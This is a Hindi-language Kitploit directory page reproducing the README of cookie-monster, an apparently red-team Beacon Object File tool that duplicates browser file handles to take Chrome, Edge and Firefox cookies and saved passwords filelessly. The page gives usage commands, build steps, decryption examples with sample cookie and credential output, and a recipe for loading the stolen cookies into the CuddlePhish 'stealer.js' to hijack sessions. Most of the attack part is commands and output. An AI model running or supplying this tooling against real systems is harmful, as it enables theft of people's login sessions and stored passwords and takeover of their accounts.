Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
cookie-monster — BOF-आधारित उपकरण जो हैडल डुप्लीकेशन और फ़ाइललेस डाउनलोड के माध्यम से Chrome, Edge और Firefox से ब्राउज़र कुकीज़ और क्रेडेंशियल्स निकालता है, ऑफ़लाइन डिक्रिप्शन समर्थन के साथ। | Kitploit
उपकरण/GitHubGitHub/kingofthenops/cookie-monster
डेटा निष्कासनपोस्ट-शोषणपेनिट्रेशन टेस्टिंगरेड टीमिंग
GitHubkingofthenops/cookie-monster

cookie-monster

BOF-आधारित उपकरण जो हैडल डुप्लीकेशन और फ़ाइललेस डाउनलोड के माध्यम से Chrome, Edge और Firefox से ब्राउज़र कुकीज़ और क्रेडेंशियल्स निकालता है, ऑफ़लाइन डिक्रिप्शन समर्थन के साथ।

रिपॉजिटरी देखें
5645628 दिन पहलेKitploit द्वारा समीक्षित

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

Cookie-Monster-BOF

एज, क्रोम और फ़ायरफ़ॉक्स के लिए BOF के माध्यम से ब्राउज़र कुकीज़ चुराएं!

Cookie Monster BOF एज और क्रोम दोनों के लिए WebKit मास्टर कुंजी और App Bound Encryption Key निकालेगा, एक ऐसी ब्राउज़र प्रक्रिया ढूंढेगा जिसके पास कुकीज़ और लॉगिन डेटा फ़ाइलों का हैंडल हो, हैंडल(हैंडल) की प्रतिलिपि बनाएगा और फिर लक्ष्य फ़ाइल(फ़ाइलों) को फ़ाइललेस (बिना फ़ाइल डाउनलोड किए) डाउनलोड करेगा।

एक बार कुकीज़/लॉगिन डेटा फ़ाइल(फ़ाइलें) डाउनलोड हो जाने पर, उन रहस्यों को निकालने के लिए Python डिक्रिप्शन स्क्रिप्ट का उपयोग किया जा सकता है! Firefox मॉड्यूल profiles.ini को पार्स करेगा और यह पता लगाएगा कि logins.json और key4.db फ़ाइलें कहाँ स्थित हैं और उन्हें डाउनलोड करेगा। ऑफ़लाइन डिक्रिप्शन के लिए एक अलग GitHub रेपो का संदर्भ दिया गया है।

Chrome & Edge 127+ अपडेट: नए क्रोमियम ब्राउज़र कुकीज़ (v20) कुकीज़ को एन्क्रिप्ट करने के लिए ऐप बाउंड कुंजी का उपयोग करते हैं। इसके परिणामस्वरूप, app_bound_encrypted_key प्राप्त करना थोड़ा और कठिन हो जाता है। snovvcrash को धन्यवाद, यह प्रक्रिया आपके विशेषाधिकारों को बढ़ाए बिना पूरी की जा सकती है। शर्त यह है कि आपकी प्रक्रिया वेब ब्राउज़र के एप्लिकेशन निर्देशिका से चल रही होनी चाहिए। अर्थात्, Chrome/Edge में इंजेक्ट करना होगा या ब्राउज़र के समान एप्लिकेशन निर्देशिका से एक बीकन स्पॉन करना होगा।

SYSTEM के रूप में और ब्राउज़र प्रक्रिया में इंजेक्ट किए बिना कुकीज़ को डिक्रिप्ट करें! Chrome के PostProcessData फ़ंक्शन को डिक्रिप्ट करने की खोज के लिए @sdemius और व्याख्या के लिए @b1scoito को धन्यवाद! Chrome 137+ ने PostProcessData() फ़ंक्शन को फिर से बदल दिया, इसे समझने के लिए @runassu को धन्यवाद!

नवीनतम अपडेट में @M1ndo की बदौलत WebKit मास्टर कुंजी का डिक्रिप्शन जोड़ा गया। मास्टर कुंजी ऐप बाउंड कुंजी के साथ स्वचालित रूप से डिक्रिप्ट हो जाती है। इसका उपयोग करने के लिए, Python डिक्रिप्ट स्क्रिप्ट में कुंजी जोड़ें। यह कुंजी मुख्य रूप से तब देखी जाती है जब रोमिंग प्रोफ़ाइल, Edge में संग्रहीत पासवर्ड या पुराने संग्रहीत पासवर्ड का उपयोग किया जाता है।

BOF उपयोग

root@kitploit:~
Usage: cookie-monster [--chrome || --edge || --system <Local State File Path> <PID> || --firefox || --chromeCookiePID <PID> || --chromeLoginDataPID <PID> || --edgeCookiePID <PID> || --edgeLoginDataPID <PID> ] [--cookie-only] [--key-only] [--login-data-only] [--copy-file "C:\Folder\Location\"] 
cookie-monster Examples: 
   cookie-monster --chrome 
   cookie-monster --edge
   cookie-monster --system "C:\Users\<USER>\AppData\Local\<BROWSER>\User Data\Local State" <PID>
   cookie-moster --firefox 
   cookie-monster --chromeCookiePID <PID>
   cookie-monster --chromeLoginDataPID <PID> 
   cookie-monster --edgeCookiePID <PID> 
   cookie-monster --edgeLoginDataPID <PID> 
cookie-monster Options: 
    --chrome, सभी चल रही प्रक्रियाओं और हैंडल को देखता है, यदि कोई chrome.exe से मेल खाता है तो वह कुकीज़ के हैंडल की प्रतिलिपि बनाता है और फिर फ़ाइल को CWD में कॉपी करता है 
    --edge, सभी चल रही प्रक्रियाओं और हैंडल को देखता है, यदि कोई msedge.exe से मेल खाता है तो वह कुकीज़ के हैंडल की प्रतिलिपि बनाता है और फिर फ़ाइल को CWD में कॉपी करता है 
    --system, ब्राउज़र में इंजेक्ट किए बिना क्रोमियम-आधारित ब्राउज़र ऐप बाउंड एन्क्रिप्शन कुंजी को डिक्रिप्ट करता है। Local State फ़ाइल का पथ और प्रतिरूपण के लिए उपयोगकर्ता प्रक्रिया का PID आवश्यक है 
    --firefox, profiles.ini ढूंढता है और key4.db तथा logins.json फ़ाइल का पता लगाता है 
    --chromeCookiePID, यदि Chrome PID प्रदान किया गया है, तो निर्दिष्ट प्रक्रिया को खोजें जिसके पास कुकीज़ का हैंडल है, उसके हैंडल और फ़ाइल की नकल करने के लिए PID निर्दिष्ट करें 
    --chromeLoginDataPID, यदि Chrome PID प्रदान किया गया है, तो निर्दिष्ट प्रक्रिया को खोजें जिसके पास लॉगिन डेटा का हैंडल है, उसके हैंडल और फ़ाइल की नकल करने के लिए PID निर्दिष्ट करें   
    --edgeCookiePID, यदि Edge PID प्रदान किया गया है, तो निर्दिष्ट प्रक्रिया को खोजें जिसके पास कुकीज़ का हैंडल है, उसके हैंडल और फ़ाइल की नकल करने के लिए PID निर्दिष्ट करें 
    --edgeLoginDataPID, यदि Edge PID प्रदान किया गया है, तो निर्दिष्ट प्रक्रिया को खोजें जिसके पास लॉगिन डेटा का हैंडल है, उसके हैंडल और फ़ाइल की नकल करने के लिए PID निर्दिष्ट करें  
    --key-only, केवल ऐप बाउंड एन्क्रिप्शन कुंजी प्राप्त करें। कुकी या लॉगिन डेटा फ़ाइलों को डाउनलोड करने का प्रयास न करें। 
    --cookie-only, केवल कुकी फ़ाइल प्राप्त करें। लॉगिन डेटा फ़ाइल डाउनलोड करने या ऐप बाउंड एन्क्रिप्शन कुंजी प्राप्त करने का प्रयास न करें। 
    --login-data-only, केवल लॉगिन डेटा फ़ाइल प्राप्त करें। कुकी फ़ाइल डाउनलोड करने या ऐप बाउंड एन्क्रिप्शन कुंजी प्राप्त करने का प्रयास न करें।  
    --copy-file, कुकी और लॉगिन डेटा फ़ाइल को निर्दिष्ट फ़ोल्डर में कॉपी करता है। फ़ाइललेस पुनर्प्राप्ति विधि का उपयोग नहीं करता है।   

BOF संकलित करें

संकलन से पहले सुनिश्चित करें कि Linux पर Mingw-w64 और make स्थापित है।

root@kitploit:~
make

डिक्रिप्शन चरण

आवश्यकताएँ स्थापित करें

root@kitploit:~
pip3 install -r requirements.txt

उपयोग

root@kitploit:~
python3 decrypt.py -h                                                                                                                                                                      
usage: decrypt.py [-h] -k KEY -o {cookies,passwords,cookie-editor,cuddlephish,firefox} -f FILE [--chrome-aes-key CHROME_AES_KEY]

Decrypt Chromium cookies and passwords given a key and DB file

options:
  -h, --help            show this help message and exit
  -k KEY, --key KEY     Decryption key
  -o {cookies,passwords,cookie-editor,cuddlephish,firefox}, --option {cookies,passwords,cookie-editor,cuddlephish,firefox}
                        Option to choose
  -f FILE, --file FILE  Location of the database file
  --chrome-aes-key CHROME_AES_KEY
                        Chrome AES Key
  -mk MASTER_KEY, --master-key MASTER_KEY
                        Old key used in v10 passwords

उदाहरण: Chrome/Edge कुकीज़ फ़ाइल डिक्रिप्ट करें

root@kitploit:~
python .\decrypt.py -k "\xec\xfc...." -o cookies -f ChromeCookies.db

Results Example:
-----------------------------------
Host: .github.com
Path: /
Name: dotcom_user
Cookie: KingOfTheNOPs
Expires: Oct 28 2024 21:25:22

Host: github.com
Path: /
Name: user_session
Cookie: x123.....
Expires: Nov 11 2023 21:25:22

Chrome कुकीज़ को Chrome AES कुंजी के साथ डिक्रिप्ट करें

root@kitploit:~
python3 decrypt.py --chrome-aes-key '\x8e\....' -k "\x03\...." -o cuddlephish -f ChromeCookies.db
Cookies saved to cuddlephish_2025-07-03_01-53-57.json

Chrome/Edge कुकीज़ फ़ाइल डिक्रिप्ट करें और JSON में सहेजें

root@kitploit:~
python .\decrypt.py -k "\xec\xfc...." -o cookie-editor -f ChromeCookies.db
Results Example:
Cookies saved to 2025-04-11_18-06-10_cookies.json

कुकीज़ JSON फ़ाइल को https://cookie-editor.com/ के साथ आयात करें

Chrome/Edge पासवर्ड फ़ाइल डिक्रिप्ट करें

root@kitploit:~
python3 decrypt.py -o passwords -f EdgePasswords.db -k '\xf9\x...' -mk '\xf3\x..'

URL: https://test.com/
Username: adgf
Password: pass

Results Example:
-----------------------------------
URL: https://test.com/
Username: tester
Password: McTesty

Firefox कुकीज़ और संग्रहीत क्रेडेंशियल्स डिक्रिप्ट करें:
https://github.com/lclevy/firepwd

CuddlePhish समर्थन

डिक्रिप्ट स्क्रिप्ट में cuddlephish विकल्प जोड़ा गया, जो https://github.com/fkasler/cuddlephish के साथ कुकी का उपयोग करने में सहायक होना चाहिए।

root@kitploit:~
# कुकीज़ डिक्रिप्ट करें
python3 decrypt.py -k "\xec\xfc..." -o cuddlephish -f ChromeCookies.db

# प्रोजेक्ट क्लोन करें
cd 
git clone https://github.com/fkasler/cuddlephish
cd cuddlephish

# डेबियन पर निर्भरता स्थापित करने का उदाहरण 
curl -fsSL https://deb.nodesource.com/setup_23.x -o nodesource_setup.sh
sudo -E bash nodesource_setup.sh
sudo apt-get install nodejs
npm install

# कुकीज़ आयात करें
cp ~/cookie-monster/cuddlephish_YYYY-MM-DD_HH-MM-SS.json .
node stealer.js cuddlephish_YYYY-MM-DD_HH-MM-SS.json

संदर्भ

यह परियोजना Mr-Un1k0d3r और उनके शानदार मौसमी वीडियो की मदद के बिना संभव नहीं हो पाती! उनके पाठों को देखने की अत्यधिक अनुशंसा करता हूँ!!!
Cookie Webkit Master Key Extractor: https://github.com/Mr-Un1k0d3r/Cookie-Graber-BOF
Fileless download: https://github.com/fortra/nanodump
Decrypt Cookies and Login Data: https://github.com/login-securite/DonPAPI
App Bound Key Decryption: https://gist.github.com/snovvcrash/caded55a318bbefcb6cc9ee30e82f824
Decrypt Chrome 137+ Cookies https://github.com/runassu/chrome_v20_decryption

टूल डाउनलोड करें